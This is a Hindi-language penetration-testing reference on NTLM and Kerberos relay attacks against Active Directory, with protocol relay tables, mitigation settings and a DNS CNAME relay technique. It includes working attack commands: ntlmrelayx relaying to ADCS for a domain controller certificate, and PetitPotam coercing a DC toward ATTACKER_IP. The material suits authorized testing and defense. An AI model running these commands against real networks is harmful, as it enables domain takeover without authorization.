
एकाधिक रिले तकनीकों का तकनीकी संदर्भ
अधिकृत आंतरिक पैठ परीक्षणों के दौरान NTLM रिले हमलों के लिए एक व्यापक संदर्भ। प्रमाणीकरण मूल बातें, मजबूरी तकनीक, प्रति-प्रोटोकॉल रिले लक्ष्य, टूलिंग, उन्नत श्रृंखला और रक्षात्मक शमन को शामिल करता है।
आधुनिक (CVE-2019-1040 के बाद पैच किए गए) वातावरणों पर क्लासिक NTLM रिले पर लागू होता है। अधिक विस्तृत क्रॉस-प्रोटोकॉल विवरण के लिए, क्रॉस-प्रोटोकॉल रिले देखें।
* लक्ष्य को SMB हस्ताक्षर की आवश्यकता नहीं होनी चाहिए † SMB-स्रोतित NTLM में NEGOTIATE में हस्ताक्षर फ्लैग शामिल होते हैं, जिन्हें LDAP और ADCS HTTP लागू करता है — जिससे रिले किए गए सत्र के लिए हस्ताक्षर कुंजी की आवश्यकता होती है जो हमलावर के पास नहीं है। यही कारण है कि LDAP और ADCS रिले के लिए WebDAV/HTTP-स्रोतित प्रमाणीकरण पसंद किया जाता है।
Cymulate / CVE-2026-20929 आदिम (जनवरी 2026) — हमलावर DNS को CNAME से दूषित करता है, विंडोज SPN को कैनोनिकलाइज़ करता है, क्लाइंट हमलावर के चुने हुए लक्ष्य के लिए TGS का अनुरोध करता है, AP-REQ रिले किया जाता है। चूंकि कई सेवाएँ केवल SPN के DNS भाग के आधार पर टिकट स्वीकार करती हैं, स्रोत SPN वर्ग NTLM रिले की तुलना में बहुत कम मायने रखता है — हमले को क्या रोकता है कि लक्ष्य सेवा अपने स्वयं के एंटी-रिले नियंत्रण को लागू करती है या नहीं।
सभी पंक्तियाँ मानती हैं कि हमलावर के पास DNS (mitm6 के माध्यम से DHCPv6, ARP, रोग DHCPv4) को दूषित करने के लिए नेटवर्क स्थिति है। पूरी तकनीक: DNS CNAME दुरुपयोग के माध्यम से केर्बेरोस रिले।
# क्लासिक उदाहरण: DC को मजबूर करें, DC प्रमाणपत्र के लिए ADCS पर रिले करें
ntlmrelayx.py -t http://ca.corp.local/certsrv/certfnsh.asp -smb2support --adcs --template DomainController
python3 PetitPotam.py ATTACKER_IP DC_IP
| स्रोत प्रमाणीकरण | → SMB | → LDAP | → MSSQL | → HTTP | → ADCS | → SOCKS |
|---|
| SMB | ✅* | ❌† | ✅ | ✅ | ❌† | ✅ |
| HTTP | ✅* | ✅ | ✅ | ✅ | ✅ | ✅ |
| WebDAV | ✅* | ✅ | ✅ | ✅ | ✅ | ✅ |
| MSSQL | ✅* | ✅ | ✅ | ✅ | ✅ | ✅ |
| लक्ष्य सेवा | रिले करने योग्य जब तक... | पैच / स्थिति |
|---|
| SMB | SMB हस्ताक्षर लक्ष्य पर आवश्यक है | — |
| LDAP | LDAP हस्ताक्षर आवश्यक है | — |
| LDAPS | LdapEnforceChannelBinding = 2 (हमेशा) | — |
| HTTP / IIS | HTTP CBT लागू (HTTP.sys टोकन जाँच = आवश्यक) | CVE-2026-20929 HTTP.sys CBT को बैकपोर्ट करता है |
ADCS /certsrv/ | विस्तारित सुरक्षा = vdir पर आवश्यक | HTTP.sys CBT CVE-2026-20929 के माध्यम से लागू होता है |
| MSSQL | विस्तारित सुरक्षा सक्षम | — |
| एक्सचेंज (OWA/ECP/…) | सभी वर्चुअल निर्देशिकाओं पर EPA | — |